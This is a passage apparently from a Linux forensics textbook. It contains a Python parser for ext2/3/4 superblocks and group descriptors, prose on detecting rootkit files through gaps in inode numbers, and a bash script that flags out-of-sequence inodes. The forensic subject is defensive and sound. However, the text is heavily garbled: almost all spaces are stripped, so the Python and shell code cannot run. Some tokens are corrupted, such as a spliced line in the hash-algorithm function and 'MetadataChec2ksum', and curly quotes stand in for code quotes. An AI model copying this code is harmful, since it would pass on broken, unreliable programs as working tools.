ifu32&0x10:
retList.append(‘MetaBlockGroups’)
ifu32&0x40:
retList.append(‘Extents’)
ifu32&0x80:
retList.append(‘64-bit’)
ifu32&0x100:
retList.append(‘MultipleMountProtection’)
ifu32&0x200:
retList.append(‘FlexibleBlockGroups’)
ifu32&0x400:
retList.append(‘ExtendedAttributesinInodes’)
ifu32&0x1000:
retList.append(‘DirectoryData’)
ifu32&0x2000:
retList.append(‘BlockGroupMetadataChecksum’)
ifu32&0x4000:
retList.append(‘LargeDirectory’)
ifu32&0x8000:
retList.append(‘InlineData’)
ifu32&0x10000:
retList.append(‘EncryptedInodes’)
returnretList
defgetReadonlyCompatibleFeaturesList(u32):
retList=[]
ifu32&0x1:
retList.append(‘SparseSuper’)
ifu32&0x2:
retList.append(‘LargeFile’)
ifu32&0x4:
retList.append(‘BtreeDirectory’)
ifu32&0x8:
retList.append(‘HugeFile’)
ifu32&0x10:
retList.append(‘GroupDescriptorTableChecksum’)
ifu32&0x20:
retList.append(‘DirectoryNlink’)
ifu32&0x40:
retList.append(‘ExtraIsize’)
ifu32&0x80:
retList.append(‘HasSnapshot’)
ifu32&0x100:
retList.append(‘Quota’)
ifu32&0x200:
retList.append(‘BigAlloc’)
ifu32&0x400:
retList.append(‘MetadataChec2ksum’)
ifu32&0x800:
retList.append(‘Replica’)
ifu32&0x1000:
retList.append(‘Read-only’)
returnretList
“””
Thisclasswillparsethedatainasuperblock
fromanextended(ext2/ext3/ext4)Linuxfilesystem.
ItisuptodateasofJuly2015.
Usage:sb.Superblock(data)where
dataisapackedstringatleast1024bytes
longthatcontainsasuperblockinthefirst1024bytes.
sb.prettyPrint()printsoutallfieldsinthesuperblock.
“””
classSuperblock():
def__init__(self,data):
self.totalInodes=getU32(data)
self.totalBlocks=getU32(data,4)
self.restrictedBlocks=getU32(data,8)
self.freeBlocks=getU32(data,0xc)
self.freeInodes=getU32(data,0x10)
#normally0unlessblocksizeis<4k
self.firstDataBlock=getU32(data,0x14)
#blocksizeis1024*2^(whateverisinthisfield)
self.blockSize=pow(2,10+getU32(data,0x18))
#onlyusedifbigallocfeatureenabled
self.clusterSize=pow(2,getU32(data,0x1c))
self.blocksPerGroup=getU32(data,0x20)
#onlyusedifbigallocfeatureenabled
self.clustersPerGroup=getU32(data,0x24)
self.inodesPerGroup=getU32(data,0x28)
self.mountTime=time.gmtime(getU32(data,0x2c))
self.writeTime=time.gmtime(getU32(data,0x30))
#mountssincelastfsck
self.mountCount=getU16(data,0x34)
#mountsbetweenfsck
self.maxMountCount=getU16(data,0x36)
#shouldbe0xef53
self.magic=getU16(data,0x38)
#0001/0002/0004=cleanlyunmounted/errors/orphans
self.state=getU16(data,0x3a)
#whenerrors1/2/3continue/read-only/panic
self.errors=getU16(data,0x3c)
self.minorRevision=getU16(data,0x3e)
#lastfscktime
self.lastCheck=time.gmtime(getU32(data,0x40))
#secondsbetweenchecks
self.checkInterval=getU32(data,0x44)
#0/1/2/3/4Linux/Hurd/Masix/FreeBSD/Lites
self.creatorOs=getU32(data,0x48)
#0/1original/v2withdynamicinodesizes
self.revisionLevel=getU32(data,0x4c)
#UIDforreservedblocks
self.defaultResUid=getU16(data,0x50)
#GIDforreservedblocks
self.defaultRegGid=getU16(data,0x52)
#forExt4dynamicrevisionLevelsuperblocksonly!
#firstnon-reservedinode
self.firstInode=getU32(data,0x54)
#inodesizeinbytes
self.inodeSize=getU16(data,0x58)
#blockgroupthissuperblockisin
self.blockGroupNumber=getU16(data,0x5a)
#compatiblefeatures
self.compatibleFeatures=getU32(data,0x5c)
self.compatibleFeaturesList=\
getCompatibleFeaturesList(self.compatibleFeatures)
#incompatiblefeatures
self.incompatibleFeatures=getU32(data,0x60)
self.incompatibleFeaturesList=\
getIncompatibleFeaturesList(self.incompatibleFeatures)
#read-onlycompatiblefeatures
self.readOnlyCompatibleFeatures=getU32(data,0x64)
self.readOnlyCompatibleFeaturesList=\
getReadonlyCompatibleFeaturesList(self.readOnlyCompatibleFeatures)
#UUIDforvolumeleftasapackedstring
self.uuid=getU128(data,0x68)
#volumename-likelyempty
self.volumeName=data[0x78:0x88].split(“\x00”)[0]
#directorywherelastmounted
self.lastMounted=data[0x88:0xc8].split(“\x00”)[0]
#usedwithcompression
self.algorithmUsageBitmap=getU32(data,0xc8)
#notusedinext4
self.preallocBlocks=getU8(data,0xcc)
#onlyusedwithDIR_PREALLOCfeature
self.preallocDirBlock=getU8(data,0xcd)
#blocksreservedforfutureexpansion
self.reservedGdtBlocks=getU16(data,0xce)
#UUIDofjournalsuperblock
self.journalUuid=getU128(data,0xd0)
#inodenumberofjournalfile
self.journalInode=getU32(data,0xe0)
#devicenumberforjournalifexternaljournalused
self.journalDev=getU32(data,0xe4)
#startoflistoforphanedinodestodelete
self.lastOrphan=getU32(data,0xe8)
self.hashSeed=[]
#htreehashseed
self.hashSeed.append(getU32(data,0xec))
self.hashSeed.append(getU32(data,0xf0))
self.hashSeed.append(getU32(data,0xf4))
self.hashSeed.append(getU32(data,0xf8))
#0/1/2/3/4/5legacy/halfMD4/tea/u-legacy/u-halfMD4/u-Tea
self.hashVersion=getU8(data,0xfc)
self.journalBackupType=getU8(data,0xfd)
#groupdescriptorsizeif64-bitfeatureenabled
self.descriptorSize=getU16(data,0xfe)
self.defaultMountOptions=getU32(data,0x100)
#onlyusedwithmetabgfeature
self.firstMetaBlockGroup=getU32(data,0x104)
#whenwasthefilesystemcreated
self.mkfsTime=time.gmtime(getU32(data,0x108))
self.journalBlocks=[]
#backupcopyofjournalinodesandsizeinlasttwoelements
foriinrange(0,17):
self.journalBlocks.append(getU32(data,0x10c+i*4))
#for64-bitmodeonly
self.blockCountHi=getU32(data,0x150)
self.reservedBlockCountHi=getU32(data,0x154)
self.freeBlocksHi=getU32(data,0x158)
#allinodessuchhaveatleastthismuchspace
self.minInodeExtraSize=getU16(data,0x15c)
#newinodesshouldreservethismanybytes
self.wantInodeExtraSize=getU16(data,0x15e)
#1/2/4signedhash/unsignedhash/testcode
self.miscFlags=getU32(data,0x160)
#logicalblocksreadfromdiskinRAIDbeforemovingtonextdisk
self.raidStride=getU16(data,0x164)
#secondstowaitbetweenmulti-mountchecks
self.mmpInterval=getU16(data,0x166)
#blocknumberforMMPdata
self.mmpBlock=getU64(data,0x168)
#howmanyblocksread/writetillbackonthisdisk
self.raidStripeWidth=getU32(data,0x170)
#groupsperflexgroup
self.groupsPerFlex=pow(2,getU8(data,0x174))
#shouldbe1forcrc32
self.metadataChecksumType=getU8(data,0x175)
#shouldbezeroes
self.reservedPad=getU16(data,0x176)
#kilobyteswrittenforalltime
self.kilobytesWritten=getU64(data,0x178)
#inodeofactivesnapshot
self.snapshotInode=getU32(data,0x180)
#idoftheactivesnapshot
self.snapshotId=getU32(data,0x184)
#blocksreservedforsnapshot
self.snapshotReservedBlocks=getU64(data,0x188)
#inodenumberofheadofsnapshotlist
self.snapshotList=getU32(data,0x190)
self.errorCount=getU32(data,0x194)
#timefirsterrordetected
self.firstErrorTime=time.gmtime(getU32(data,0x198))
#guiltyinode
self.firstErrorInode=getU32(data,0x19c)
#guiltyblock
self.firstErrorBlock=getU64(data,0x1a0)
#guiltyfunction
self.firstErrorFunction=\
data[0x1a8:0x1c8].split(“\x00”)[0]
#linenumberwhereerroroccurred
self.firstErrorLine=getU32(data,0x1c8)
#timelasterrordetected
self.lastErrorTime=time.gmtime(getU32(data,0x1cc))
#guiltyinode
self.lastErrorInode=getU32(data,0x1d0)
#linenumberwhereerroroccurred
self.lastErrorLine=getU32(data,0x1d4)
#guiltyblock
self.lastErrorBlock=getU64(data,0x1d8)
#guiltyfunction
self.lastErrorFunction=\
data[0x1e0:0x200].split(“\x00”)[0]
#mountoptionsinnull-terminatedstring
self.mountOptions=\
data[0x200:0x240].split(“\x00”)[0]
#inodeofuserquotafile
self.userQuotaInode=getU32(data,0x240)
#inodeofgroupquotafile
self.groupQuotaInode=getU32(data,0x244)
#shouldbezero
self.overheadBlocks=getU32(data,0x248)
#supersparse2only
self.backupBlockGroups=\
[getU32(data,0x24c),getU32(data,0x250)]
self.encryptionAlgorithms=[]
foriinrange(0,4):
self.encryptionAlgorithms.append(\
getU32(data,0x254+i*4))
self.checksum=getU32(data,0x3fc)
defblockGroups(self):
bg=self.totalBlocks/self.blocksPerGroup
ifself.totalBlocks%self.blocksPerGroup!=0:
bg+=1
returnbg
defgroupDescriptorSize(self):
if‘64-bit’inself.incompatibleFeaturesList:
return64
else:
return32
defprintState(self):
#0001/0002/0004=cleanlyunmounted/errors/orphans
retVal=“Unknown”
ifself.state==1:
retVal=“Cleanlyunmounted”
elifself.state==2:
retVal=“Errorsdetected”
elifself.state==4:
retVal=“Orphansbeingrecovered”
returnretVal
defprintErrorBehavior(self):
#whenerrors1/2/3continue/read-only/panic
retVal=“Unknown”
ifself.errors==1:
retVal=“Continue”
elifself.errors==2:
retVal=“Remountread-only”
elifself.errors==3:
retVal=“Kernelpanic”
returnretVal
defprintCreator(self):
#0/1/2/3/4Linux/Hurd/Masix/FreeBSD/Lites
retVal=“Unknown”
ifself.creatorOs==0:
retVal=“Linux”
elifself.creatorOs==1:
retVal=“Hurd”
elifself.creatorOs==2:
retVal=“Masix”
elifself.creatorOs==3:
retVal=“FreeBSD”
elifself.creatorOs==4:
retVal=“Lites”
returnretVal
defprintHashAlgorithm(self):
#0/1/2/3/4/5legacy/halfMD4/tea/u-legacy/u-halfMD4/u-Tea
retVal=“Unknown”
ifself.hashVersion==0:
retVal=“Legacy”
elifself.hashVersion==1:
retVal=“HalfMD4”
elifself.hashVersion==2:
retVal=“Tea”32sion==3:
retVal=“UnsignedLegacy”
elifself.hashVersion==4:
retVal=“UnsignedHalfMD4”
elifself.hashVersion==5:
retVal=“UnsignedTea”
returnretVal
defprintEncryptionAlgorithms(self):
encList=[]
forvinself.encryptionAlgorithms:
ifv==1:
encList.append(‘256-bitAESinXTSmode’)
elifv==2:
encList.append(‘256-bitAESinGCMmode’)
elifv==3:
encList.append(‘256-bitAESinCBCmode’)
elifv==0:
pass
else:
encList.append(‘Unknown’)
returnencList
defprettyPrint(self):
fork,vinsorted(self.__dict__.iteritems()):
ifk==‘mountTime’ork==‘writeTime’or\
k==‘lastCheck’ork==‘mkfsTime’or\
k==‘firstErrorTime’ork==‘lastErrorTime’:
printk+”:”,time.asctime(v)
elifk==‘state’:
printk+”:”,self.printState()
elifk==‘errors’:
printk+”:”,self.printErrorBehavior()
elifk==‘uuid’ork==‘journalUuid’:
printk+”:”,printUuid(v)
elifk==‘creatorOs’:
printk+”:”,self.printCreator()
elifk==‘hashVersion’:
printk+”:”,self.printHashAlgorithm()
elifk==‘encryptionAlgorithms’:
printk+”:”,self.printEncryptionAlgorithms()
else:
printk+”:”,v
defgroupStartBlock(self,bgNo):
returnself.blocksPerGroup*bgNo
defgroupEndBlock(self,bgNo):
returnself.groupStartBlock(bgNo+1)-1
defgroupStartInode(self,bgNo):
returnself.inodesPerGroup*bgNo+1
defgroupEndInode(self,bgNo):
returnself.inodesPerGroup*(bgNo+1)
defgroupFromBlock(self,blockNo):
returnblockNo/self.blocksPerGroup
defgroupIndexFromBlock(self,blockNo):
returnblockNo%self.blocksPerGroup
defgroupFromInode(self,inodeNo):
return(inodeNo-1)/self.inodesPerGroup
defgroupIndexFromInode(self,inodeNo):
return(inodeNo-1)%self.inodesPerGroup
defgroupHasSuperblock(self,bgNo):
#blockgroupzeroalwayshasasuperblock
ifbgNo==0:
returnTrue
retVal=False
if‘MetaBlockGroups’inself.incompatibleFeaturesListand\
bgNo>=self.firstMetaBlockGroup:
#metablockgroupshaveasbandgdtin1stand
#2ndandlastofeachmetagroup
#metablockgroupsizeisblocksize/32
#onlypartoffilesystemmightusethisfeature
mbgSize=self.blockSize/32
retVal=(bgNo%mbgSize==0)or\
((bgNo+1)%mbgSize==0)or\
((bgNo-1)%mbgSize==0)
elif‘SparseSuper2’inself.compatibleFeaturesList:
#twobackupsuperblocksinself.backupBlockGroups
ifbgNo==self.backupBlockGroups[0]or\
bgNo==self.backupBlockGroups[1]:
retVal=True
elif‘SparseSuper’inself.readOnlyCompatibleFeaturesList:
#backupsin1,powersof3,5,and7
retVal=(bgNo==1)or\
(bgNo==pow(3,round(log(bgNo)/log(3))))\
or(bgNo==pow(5,round(log(bgNo)/log(5))))\
or(bgNo==pow(7,round(log(bgNo)/log(7))))
ifretVal:
returnretVal
else:
#ifwegotthisfarwemusthavedefault
#witheverybghavingsbandgdt
retVal=True
returnretVal
“””
Thisclassstorestherawgroupdescriptorsfrom
aLinuxextended(ext2/ext3/ext4)filesystem.It
islittlemorethanaglorifiedstructure.Both
32-bitand64-bit(wide)filesystemsaresupported.
ItisuptodateasofJuly2015.
Usage:gd=GroupDescriptor(data,wide)where
dataisa32bytegroupdescriptorifwideisfalse
or64bytegroupdescriptorifwideistrue.
gd.prettyPrint()printsallthefieldsinan
organizedmanner.
“””
classGroupDescriptor():
def__init__(self,data,wide=False):
self.wide=wide
#/*Blocksbitmapblock*/
self.blockBitmapLo=getU32(data)
#/*Inodesbitmapblock*/
self.inodeBitmapLo=getU32(data,4)
#/*Inodestableblock*/
self.inodeTableLo=getU32(data,8)
#/*Freeblockscount*/
self.freeBlocksCountLo=getU16(data,0xc)
#/*Freeinodescount*/
self.freeInodesCountLo=getU16(data,0xe)
#/*Directoriescount*/
self.usedDirsCountLo=getU16(data,0x10)
#/*EXT4_BG_flags(INODE_UNINIT,etc)*/
self.flags=getU16(data,0x12)
self.flagList=self.printFlagList()
#/*Excludebitmapforsnapshots*/
self.excludeBitmapLo=getU32(data,0x14)
#/*crc32c(s_uuid+grp_num+bbitmap)LE*/
self.blockBitmapCsumLo=getU16(data,0x18)
#/*crc32c(s_uuid+grp_num+ibitmap)LE*/
self.inodeBitmapCsumLo=getU16(data,0x1a)
#/*Unusedinodescount*/
self.itableUnusedLo=getU16(data,0x1c)
#/*crc16(sb_uuid+group+desc)*/
self.checksum=getU16(data,0x1e)
ifwide==True:
#/*BlocksbitmapblockMSB*/
self.blockBitmapHi=getU32(data,0x20)
#/*InodesbitmapblockMSB*/
self.inodeBitmapHi=getU32(data,0x24)
#/*InodestableblockMSB*/
self.inodeTableHi=getU32(data,0x28)
#/*FreeblockscountMSB*/
self.freeBlocksCountHi=getU16(data,0x2c)
#/*FreeinodescountMSB*/
self.freeInodesCountHi=getU16(data,0x2e)
#/*DirectoriescountMSB*/
self.usedDirsCountHi=getU16(data,0x30)
#/*UnusedinodescountMSB*/
self.itableUnusedHi=getU16(data,0x32)
#/*ExcludebitmapblockMSB*/
self.excludeBitmapHi=getU32(data,0x34)
#/*crc32c(s_uuid+grp_num+bbitmap)BE*/
self.blockBitmapCsumHi=getU16(data,0x38)
#/*crc32c(s_uuid+grp_num+ibitmap)BE*/
self.inodeBitmapCsumHi=getU16(data,0x3a)
self.reserved=getU32(data,0x3c)
defprintFlagList(self):
flagList=[]
#inodetableandbitmaparenotinitialized(EXT4_BG_INODE_UNINIT).
ifself.flags&0x1:
flagList.append(‘InodeUninitialized’)
#blockbitmapisnotinitialized(EXT4_BG_BLOCK_UNINIT).
ifself.flags&0x2:
flagList.append(‘BlockUninitialized’)
#inodetableiszeroed(EXT4_BG_INODE_ZEROED).
ifself.flags&0x4:
flagList.append(‘InodeZeroed’)
returnflagList
defprettyPrint(self):
fork,vinsorted(self.__dict__.iteritems()):
printk+”:”,v
“””
Thisclasscombinesinformatonfromtheblockgroupdescriptor
andthesuperblocktomorefullydescribetheblockgroup.It
isuptodateasofJuly2015.
Usageegd=ExtendedGroupDescriptor(bgd,sb,bgNo)where
bgdisaGroupDescriptorobject,sbisaSuperblockobject,
andbgNoisablockgroupnumber.
egd.prettyPrint()printsoutvariousstatisticsforthe
blockgroupandalsoitslayout.
“””
classExtendedGroupDescriptor():
def__init__(self,bgd,sb,bgNo):
self.blockGroup=bgNo
self.startBlock=sb.groupStartBlock(bgNo)
self.endBlock=sb.groupEndBlock(bgNo)
self.startInode=sb.groupStartInode(bgNo)
self.endInode=sb.groupEndInode(bgNo)
self.flags=bgd.printFlagList()
self.freeInodes=bgd.freeInodesCountLo
ifbgd.wide:
self.freeInodes+=bgd.freeInodesCountHi*pow(2,16)
self.freeBlocks=bgd.freeBlocksCountLo
ifbgd.wide:
self.freeBlocks+=bgd.freeBlocksCountHi*pow(2,16)
self.directories=bgd.usedDirsCountLo
ifbgd.wide:
self.directories+=bgd.usedDirsCountHi*pow(2,16)
self.checksum=bgd.checksum
self.blockBitmapChecksum=bgd.blockBitmapCsumLo
ifbgd.wide:
self.blockBitmapChecksum+=bgd.blockBitmapCsumHi*pow(2,16)
self.inodeBitmapChecksum=bgd.inodeBitmapCsumLo
ifbgd.wide:
self.inodeBitmapChecksum+=bgd.inodeBitmapCsumHi*pow(2,16)
#nowfigureoutthelayoutandstoreitinalist(withlistsinside)
self.layout=[]
self.nonDataBlocks=0
#forflexibleblockgroupsmustmakeanadjustment
fbgAdj=1
if‘FlexibleBlockGroups’insb.incompatibleFeaturesList:
#onlyfirstgroupinflexblockaffected
ifbgNo%sb.groupsPerFlex==0:
fbgAdj=sb.groupsPerFlex
ifsb.groupHasSuperblock(bgNo):
self.layout.append([‘Superblock’,self.startBlock,\
self.startBlock])
gdSize=sb.groupDescriptorSize()*sb.blockGroups()/
sb.blockSize
self.layout.append([‘GroupDescriptorTable’,\
self.startBlock+1,self.startBlock+gdSize])
self.nonDataBlocks+=gdSize+1
ifsb.reservedGdtBlocks>0:
self.layout.append([‘ReservedGDTBlocks’,\
self.startBlock+gdSize+1,\
self.startBlock+gdSize+sb.reservedGdtBlocks])
self.nonDataBlocks+=sb.reservedGdtBlocks
bbm=bgd.blockBitmapLo
ifbgd.wide:
bbm+=bgd.blockBitmapHi*pow(2,32)
self.layout.append([‘DataBlockBitmap’,bbm,bbm])
#isblockbitmapinthisgroup(notflexblockgroup,etc)
ifsb.groupFromBlock(bbm)==bgNo:
self.nonDataBlocks+=fbgAdj
ibm=bgd.inodeBitmapLo
ifbgd.wide:
ibm+=bgd.inodeBitmapHi*pow(2,32)
self.layout.append([‘InodeBitmap’,ibm,ibm])
#isinodebitmapinthisgroup?
ifsb.groupFromBlock(ibm)==bgNo:
self.nonDataBlocks+=fbgAdj
it=bgd.inodeTableLo
ifbgd.wide:
it+=bgd.inodeTableHi*pow(2,32)
itBlocks=(sb.inodesPerGroup*sb.inodeSize)/sb.blockSize
self.layout.append([‘InodeTable’,it,it+itBlocks-1])
#isinodetableinthisgroup?
ifsb.groupFromBlock(it)==bgNo:
self.nonDataBlocks+=itBlocks*fbgAdj
self.layout.append([‘DataBlocks’,self.startBlock\
+self.nonDataBlocks,self.endBlock])
defprettyPrint(self):
print“”
print‘BlockGroup:‘+str(self.blockGroup)
print‘Flags:%r‘%self.flags
print‘Blocks:%s-%s‘%(self.startBlock,self.endBlock)
print‘Inodes:%s-%s‘%(self.startInode,self.endInode)
print‘Layout:’
foriteminself.layout:
print‘%s%s-%s’%(item[0],item[1],item[2])
print‘FreeInodes:%u‘%self.freeInodes
print‘FreeBlocks:%u‘%self.freeBlocks
print‘Directories:%u‘%self.directories
print‘Checksum:0x%x‘%self.checksum
print‘BlockBitmapChecksum:0x%x‘%self.blockBitmapChecksum
print‘InodeBitmapChecksum:0x%x‘%self.inodeBitmapChecksum
“””
Thisclassreadsthesuperblockandblockgroupdescriptors
fromanimagefilecontainingaLinuxextended(ext2/ext3/ext4)
filesystemandthenstoresthefilesystemmetadatainanorganized
manner.ItisuptodateasofJuly2015.
Usage:emd=ExtMetadata(filename,offset)wherefilenameisa
rawimagefileandoffsetistheoffsetin512bytesectorsfrom
thestartofthefiletothefirstsectoroftheextendedfilesystem.
emd.prettyPrint()willprintoutthesuperblockinformationand
theniterateovereachblockgroupprintingstatisticsandlayout
information.
“””
classExtMetadata():
def__init__(self,filename,offset):
#readfirstsector
ifnotos.path.isfile(sys.argv[1]):
print(“File“+str(filename)+\
“cannotbeopennedforreading”)
exit(1)
withopen(str(filename),‘rb’)asf:
f.seek(1024+int(offset)*512)
sbRaw=str(f.read(1024))
self.superblock=Superblock(sbRaw)
#readblockgroupdescriptors
self.blockGroups=self.superblock.blockGroups()
ifself.superblock.descriptorSize!=0:
self.wideBlockGroups=True
self.blockGroupDescriptorSize=64
else:
self.wideBlockGroups=False
self.blockGroupDescriptorSize=32
#readingroupdescriptorsstartinginblock1
withopen(str(filename),‘rb’)asf:
f.seek(int(offset)*512+self.superblock.blockSize)
bgdRaw=str(f.read(self.blockGroups*\
self.blockGroupDescriptorSize))
self.bgdList=[]
foriinrange(0,self.blockGroups):
bgd=GroupDescriptor(bgdRaw[i*self.blockGroupDescriptorSize:]\
,self.wideBlockGroups)
ebgd=ExtendedGroupDescriptor(bgd,self.superblock,i)
self.bgdList.append(ebgd)
defprettyPrint(self):
self.superblock.prettyPrint()
forbgdinself.bgdList:
bgd.prettyPrint()
defusage():
print(“usage“+sys.argv[0]+\
“<imagefile><offsetinsectors>\n”+\
“Readssuperblockfromanimagefile”)
exit(1)
defmain():
iflen(sys.argv)<3:
usage()
#readfirstsector
ifnotos.path.isfile(sys.argv[1]):
print(“File“+sys.argv[1]+“cannotbeopennedforreading”)
exit(1)
emd=ExtMetadata(sys.argv[1],sys.argv[2])
emd.prettyPrint()
if__name__==“__main__”:
main()
PartialresultsfromrunningthisscriptagainstthePFEsubjectsystemimageareshownin Figure 7.13, Figure 7.14, and Figure 7.15. In Figure 7.13we see that flexible blockgroupsareinuse.Notshowninthisfigureisaflexibleblockgroupsizeof16.InFigure7.14 the firstblockgroup is shown.As isalways thecase, it containsa superblockandgroup descriptor table (including the reserved blocks for future expansion). You willnotice that there are 16 blocks between the data bitmap and inode bitmap, and alsobetweentheinodebitmapandtheinodetable.Thisisduetothisbeingthefirstgroupinaflexible group (size=16) that houses these values for all block groups within the flexgroup.
FIGURE7.13
Resultofrunningtheextfs.pyscriptonthePFEsubjectsystem–Part1.
FIGURE7.14
Resultofrunningtheextfs.pyscriptonthePFEsubjectsystem–Part2.
InFigure7.15weseethatblockgroup3hasasuperblockandgroupdescriptor table.ThisisbecausetheSparseSuperfeatureisinusewhichstoresthesuperblockandgroupdescriptortableingroupsthatarepowersof3,5,or7.Ifyouexaminethefulloutputfrom
this command you will see that all of these backup superblocks and group descriptortablesareinthecorrectplaces.
FIGURE7.15
Resultofrunningtheextfs.pyscriptonthePFEsubjectsystem–Part3.
Beforewemoveontoanewtopic, I feel thatIshouldpointout thatwehavemerelyscratched the surface of what can be done with the classes found in this script. Forexample,theclassescouldeasilybeusedtocalculatetheoffsetintoanimageforagiveninodeordatablock.Itcouldalsobeusedtoworkbackwardfromanoffsettofigureoutwhat is stored in any given sector. Now that we have learned all of the basics of theextended filesystemswewillmoveon to discussinghowwemight detect an attacker’sactions,evenifheorshehasalteredtimestampsonthefilesystem.
FINDINGTHINGSTHATAREOUTOFPLACEThus far in this chapter we have seen a lot of theory on how the extended filesystemworks.Wecan leverage thatknowledge to find things that areoutofplaceornotquiteright.Afterall,thisisnormallywhattheforensicinvestigatorisafter.Inconsistenciesanduncommonsituationsoftenpointtoanattacker’sattempttohidehisorheractions.
Someofthesystemdirectoriessuchas/sbinand/binarehighlytargetedbyattackers.Eventhelowlylscommandcanoftenbeenoughtodetectalterationsinthesedirectories.Howcanwedetecttamperinginasystemdirectory?Whenthesystemisinstalled,filesinthe system directories are copied one after the other. As a result, the files are usuallystoredinsequentialinodes.Anythingaddedlaterbyanattackerwilllikelybeinahigherinodenumber.
Thecommandls-aliwilllistallfiles(-a)withalonglisting(-l)whichwillbegin
withaninodenumber(-i).Ifwetaketheresultsofthiscommandandpipethemtosort-n, theywillbesortednumerically(-n)by inodenumber.Theresultsofrunningls-alibin|sort-n fromwithin themountdirectory (subject’s rootdirectory)ofthePFEsubjectsystemareshowninFigure7.16.FilesassociatedwiththeXingYiQuanrootkit are highlighted.Notice that the inodes aremostly sequential and suddenly jumpfrom655,549to657,076whenthemalwarewasinstalled.
FIGURE7.16
Results of running ls -ali bin | sort -n on PFE subject image. The highlighted files are from a rootkitinstallation.
Some readers may have expected the inode numbers to be considerably higher. Theprimaryreasons that theyareonlya fewthousand inodesaway is thatLinuxwilldo itsbest to store files in a given directory in the same block group.Onlywhen there is nospaceinthecontainingdirectoriesblockgroupwillthefilebestoredelsewhere.Thisisaperformanceoptimizationthatattemptstominimizemovementoftheread/writeheadsonaharddrive.
Inthiscasetheattackerdidnotattempttoalterthetimestampsontherootkitfiles.Therearemanytoolsthatwillallowyoutoeasilymodifythesetimestamps.Theimportantthingtorealizeisthatnomatterwhatyoudotothetimestamps,theinodeswillrevealrecentlyaddedfileseverytime.
Thelscommandsupportsafewbasicsorts.Thedefaultsortisalphabetical,butitwillalso sort by extension, size, time, and version. The command ls -aliR<directory>–sort=sizewillperformarecursive(-R)listingofadirectorywitheverythingsortedbysize(largesttosmallest).Partialresultsofrunningls-aliRbin–sort=sizeareshowninFigure7.17.
FIGURE7.17
Partialresultsofrunningls-aliRbin–sort=sizeagainstthePFEsubjectimage.
Havea lookat thehighlighted filesbashand false fromFigure7.17.Noticeanythingunusual?Theonly thing /bin/falsedoes is return thevaluefalsewhencalled.Yet this isoneofthethreelargestfilesinthe/bindirectory.Itisalsosuspiciouslytheexactsamesizeas/bin/bash.Whatappearstohavehappenedhereisthattheattackercopied/bin/bashontopof/bin/falseinanattempttologinwithsystemaccounts.Noticethatthisattackerwasnotterriblysophisticatedasevidencedbythefactthattheydidn’tchangethetimestampon/bin/falsewhentheyweredone.
Becausetheattackerfailedtomodifythetimestamps,alistingsortedbytimewillalsoshowwhathashappenedprettyclearly.Apartial listingof results from thels-aliRbin–sort=time command is shown inFigure7.18.Thehighlightedportion showsboththerootkitfilesandtherecentlyaltered/bin/false.
FIGURE7.18
Partialresultsfromrunningls-aliRbin–sort=timeagainstthePFEsubjectimage.
Theadvantageofrunningthelscommandasshowninthissectionisthatitissimple.Thedownsideisthatyouhavetocarefullyscrutinizetheoutputtodetectanygapsintheinodenumbers.Somereadersmighthaveseenmonthlybankstatements that list checksthathavebeencashedagainsttheaccountlistedinorderwithanotationifachecknumberismissing.
Wouldn’t it be great ifwe could have a shell script that did something similar to thebank statement?Well, youare in luck, sucha script follows.Youare extra fortunate astherearesomenewshellscriptingtechniquesusedinthisscript.#!/bin/bash
#
#out-of-seq-inodes.sh
#
#Simplescripttolistoutof
#sequenceinodes.
#Intendedtobeusedaspartof
#aforensicsinvestigation.
#AsdevelopedforPentesterAcademy.com
#byDr.PhilPolstra(@ppolstra)
usage(){
echo“Usage:$0<path>”
echo“Simplescripttolistadirectoryandprintawarningif”
echo“theinodesareoutofsequenceaswillhappenifsystem”
echo“binariesareoverwritten.”
exit1
}
if[$#-lt1];then
usage
fi
#outputalistingsortedbyinodenumbertoatempfile
templs=’/tmp/temp-ls.txt’
ls-ali$1|sort-n>$templs
#thisisfordiscardingfirstcouplelinesinoutput
foundfirstinode=false
declare-istartinode
whilereadline
do
#thereisusuallyalineortwoofnon-filestuffatstartofoutput
#theifstatementhelpsusgetpastthat
if[“$foundfirstinode”=false]\
&&[“\echo$line|wc-w\”-gt6];then
startinode=`expr$(echo$line|awk‘{print$1}’)`
echo“Startinode=$startinode”
foundfirstinode=true
fi
q=$(echo$line|awk‘{print$1}’)
if[[$q=~^[0-9]+$]]&&\
[“$startinode”-lt$q];
then
if[$((startinode+2))-lt$q];then
echo-e“\e[31m****OutofSequenceinodedetected****\
expect$startinodegot$q\e[0m”
else
echo-e“\e[33m****OutofSequenceinodedetected****\
expect$startinodegot$q\e[0m”
fi
#resetthestartinodetopointtothisvaluefornextentry
startinode=`expr$(echo$line|awk‘{print$1}’)`
fi
echo“$line”
startinode=$((startinode+1))
done<$templs
rm$templs
Thescriptstartswiththeusualshe-bang,followedbyausagefunctionwhichiscalledwhennocommandlineargumentswerepassedin.Toimproveperformanceandalsomakethescriptsimpler,theoutputfromls-ali<directory>|sort-nissenttoatemporary file. Two variables foundfirstinode and startinode are created. The linedeclare-istartinodeisnew.Thislinecreatesanewvariablethatisanintegervalue.Italsosetsthevariabletozero.Wewillseelaterinthescriptwhythisisneeded.
Thelinewhilereadlinebeginsadoloop.Youmightwonderwherethislineiscoming from. If you look down a few lines, you will see a line that reads done <$templs.Thisconstructredirectsthetemporaryfiletobeinputfortheloop.Essentially,thisdoloopreadsthetemporaryfilelinebylineandperformstheactionslistedwithintheloopcode.
Theifblockatthestartofthedoloopisusedtoconsumeanyheadersoutputbyls.Theifhastwotestsandedtogetherwiththe&&operator.Thefirsttestcheckstoseeiffoundfirstinodeisfalsewhichindicateswehavenotmadeitpastanyheaderlinestotheactualfiledatayet.Thesecondtestexecutesthecommandecho$line|wc-wandtestsiftheresultisgreaterthansix.Recallthatenclosingacommandinbacktickscausesit to be executed and the results converted to a string. This command echoes the linewhichispipedtothewordcountutility,wc.Normallythisutilitywillprintoutcharacters,words, and lines, but the -w option causes only words to be printed. Any output linespertainingtofileswillhaveatleastsevenwords.Ifthisisthecasethestartinodevariableisset,amessageisechoedtothescreen,andfoundfirstinodeissettotrue;
The linestartinode=`expr$(echo$line|awk‘{print$1}’)` iseasier to understand if you work from the parentheses outward. The command echo$line|awk‘{print$1}’echoesthelineandpipesittoawkwhichthenprintsthefirstword(startofthelineuptothefirstwhitespacecharacter).Recallthattheinodenumberislistedfirstbythelscommand.Thisinodenumberthengetspassedtoexpr<inodenumber>which is executedbecause it is enclosed in back ticks.This inodenumberisstoredintheintegervariablestartinodewhichwasdeclaredearlierinthescript.
